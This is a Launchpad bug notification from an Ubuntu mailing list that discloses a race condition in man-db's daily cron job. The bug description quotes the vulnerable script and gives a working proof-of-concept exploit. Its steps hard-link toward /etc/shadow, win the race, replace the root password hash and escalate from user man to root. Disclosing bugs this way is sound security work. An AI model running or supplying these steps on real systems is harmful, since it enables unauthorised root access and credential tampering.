[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

Mon, 14 Dec 2015 11:41:50 -0800 

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Confirmed
Status in man-db package in Ubuntu:
  Confirmed
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
    cd /
    if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
      find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
        xargs -r0 chown -f man || true
    fi
    ...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:99999:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:    Ubuntu 14.04.3 LTS
  Release:        14.04

  # apt-cache policy man-db
  man-db:
    Installed: 2.6.7.1-1ubuntu1
    Candidate: 2.6.7.1-1ubuntu1
    Version table:
   *** 2.6.7.1-1ubuntu1 0
          500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
          100 /var/lib/dpkg/status
       2.6.7.1-1 0
          500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Reply via email to